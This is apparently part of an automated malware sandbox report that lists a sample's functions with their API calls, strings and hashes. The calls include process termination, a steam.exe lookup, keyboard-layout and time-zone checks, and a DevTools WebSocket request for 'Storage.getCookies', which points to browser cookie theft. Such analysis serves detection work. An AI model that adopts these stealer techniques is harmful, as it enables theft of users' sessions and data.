                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 574e6ddcf2df3f133979d606309f0f76610f042ae3881eef28c0cd30069b2b10
                            • Instruction ID: 3c69e79d40812991d132713c0532410c3198260d15782d2b3b236bfab6a798a0
                            • Opcode Fuzzy Hash: 574e6ddcf2df3f133979d606309f0f76610f042ae3881eef28c0cd30069b2b10
                            • Instruction Fuzzy Hash: 5CA25871E012699FDB20DFA8C8807EEBBB6FF48300F5585A9D509A7281DB705E85CF91
                            Function 008F24F9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F2524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F2552
                            • lstrlen.KERNEL32(\*.*), ref: 008F255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F2586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F25BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F25D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: de414b5d723e3c2c6b3c2fc8cb99b895dcab15daa278935768f4d5c9f0d1b265
                            • Instruction ID: de180399e9ff7f049b6043a58813d5acdd636b3ce6ee3b744ba796d1b34246b8
                            • Opcode Fuzzy Hash: de414b5d723e3c2c6b3c2fc8cb99b895dcab15daa278935768f4d5c9f0d1b265
                            • Instruction Fuzzy Hash: C2419E326102AA9BCB22EF3DDC89EAE77A8FF15300F004134B909D7252DB709D458B92
                            Function 009048B0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009048C9
                            • Process32First.KERNEL32(00000000,00000128), ref: 009048D9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009048EB
                            • StrCmpCA.SHLWAPI(?,?), ref: 009048FD
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904912
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00904921
                            • CloseHandle.KERNEL32(00000000), ref: 00904928
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00904936
                            • CloseHandle.KERNEL32(00000000), ref: 00904941
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                            • Instruction ID: 49111658b3d7f46f99396e9fef2dcc10b8c00e2a152394a25678f07c79fecbc9
                            • Opcode Fuzzy Hash: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                            • Instruction Fuzzy Hash: 90016D71601214AFE7215B60EC8DFFB377CEB48B11F404198FA09D2180EF749A858AA5
                            Function 00904820 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00904838
                            • Process32First.KERNEL32(00000000,00000128), ref: 00904848
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090485A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00904870
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00904882
                            • CloseHandle.KERNEL32(00000000), ref: 0090488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: b61bf019feaed68ed06ad943810295ca0ea5d415780445349e00a2991e23e241
                            • Instruction ID: cdb9afe42acac32cc9e0da3f253b948bbaf249e0c09473727af2a71753cb0889
                            • Opcode Fuzzy Hash: b61bf019feaed68ed06ad943810295ca0ea5d415780445349e00a2991e23e241
                            • Instruction Fuzzy Hash: 4C0162716011689FD7209B61AC49FEA77BCEF4C750F4445D5EE08D3080EF749A948AA6
                            Function 008F4C89 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4CDF
                            • lstrlen.KERNEL32(00914CAC), ref: 008F4CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D07
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F4D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F4D5A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 5fbe8bfc1448aac2c3fb218b0566155d5c4c441c250620b73f0c96e6bcb67ea7
                            • Instruction ID: c23990437677e532a4b3a01ee1b7aaba16f60208ebaaec540217b1d42e01f70f
                            • Opcode Fuzzy Hash: 5fbe8bfc1448aac2c3fb218b0566155d5c4c441c250620b73f0c96e6bcb67ea7
                            • Instruction Fuzzy Hash: 233149325211AAABCB22FF79EC85EAF77A9FF41704F006125F906D7211CB709D518B92
                            Function 00902F30 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00902F6B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00902F7D
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00902F8A
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00902FBC
                            • LocalFree.KERNEL32(00000000), ref: 0090319A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 92262720ed81243e046d5b3de46f4deb83177c3bd93bae1d0356f37866d318bf
                            • Instruction ID: 14b52bfecd56bc29533657d2207fc499a8ce135f39c5480847845fe2c28ff53d
                            • Opcode Fuzzy Hash: 92262720ed81243e046d5b3de46f4deb83177c3bd93bae1d0356f37866d318bf
                            • Instruction Fuzzy Hash: 4FB14870905204DFC714CF59D948BA5B7F9FB48724F29C1A9D408AB2E2D7769E82CF80
                            Function 00C999C6 Relevance: 9.2, Strings: 6, Instructions: 1653COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 8Nt$:g.$>]W$Ja/'$^"3}$f]o7
                            • API String ID: 0-1730553010
                            • Opcode ID: e00e4c6cf28e5555fb224743d8a4eb5c3bf9e1c7435d2c79de3837f93a43c30a
                            • Instruction ID: 459859b43631e5dd04ec63a0a254518144334fbd5e87a0cce8a573622c98d276
                            • Opcode Fuzzy Hash: e00e4c6cf28e5555fb224743d8a4eb5c3bf9e1c7435d2c79de3837f93a43c30a
                            • Instruction Fuzzy Hash: DFB23AF360C2049FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C7744EA3558018696
                            Function 00C964D7 Relevance: 9.1, Strings: 6, Instructions: 1605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $[{$58{$58{$C'||$Wl|$qgg
                            • API String ID: 0-3238819347
                            • Opcode ID: 6672155473abe5edef4894fd8484a1315b22a6e709390edf23ba4de0700aeaa9
                            • Instruction ID: 5f87da4f57f68111c6c90d32c58c51f60fac275979fa031cdfd886af03855166
                            • Opcode Fuzzy Hash: 6672155473abe5edef4894fd8484a1315b22a6e709390edf23ba4de0700aeaa9
                            • Instruction Fuzzy Hash: 38B24AF3A0C2049FE7046E2DEC8567ABBE9EF94760F1A4A3DE6C4C3744E93558058693
                            Function 00902DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902E12
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902E19
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00902E28
                            • wsprintfA.USER32 ref: 00902E53
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 25a0124ff88c3a763bed1cb449d319c1ecbe305386446c7133696b64e74fb46d
                            • Instruction ID: 7b8f22a17db15baaa11a485451a841119b4168c03764715fa0cb2e363653dd77
                            • Opcode Fuzzy Hash: 25a0124ff88c3a763bed1cb449d319c1ecbe305386446c7133696b64e74fb46d
                            • Instruction Fuzzy Hash: F201F771A00204EBC7189B58DC5DFA9B76DE784B20F108329F915D72C0DB74190086D1
                            Function 00CA3B56 Relevance: 7.9, Strings: 5, Instructions: 1655COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =6o;$Q vw$Q vw$SLG$b"%{
                            • API String ID: 0-3960046968
                            • Opcode ID: 4c25b042dc3293d1703483af8104a2bc8cf1be00d718b3be84c3215ead661ad7
                            • Instruction ID: 83a61c90a7ac1396be78392e48de9b4f0d67ccf14318540e9934ad6049caab30
                            • Opcode Fuzzy Hash: 4c25b042dc3293d1703483af8104a2bc8cf1be00d718b3be84c3215ead661ad7
                            • Instruction Fuzzy Hash: A0B218F3A0C204AFE3046E29EC8567AB7E5EFD4320F1A863DE6C5C3744EA3558058697
                            Function 00CA7195 Relevance: 7.9, Strings: 5, Instructions: 1607COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
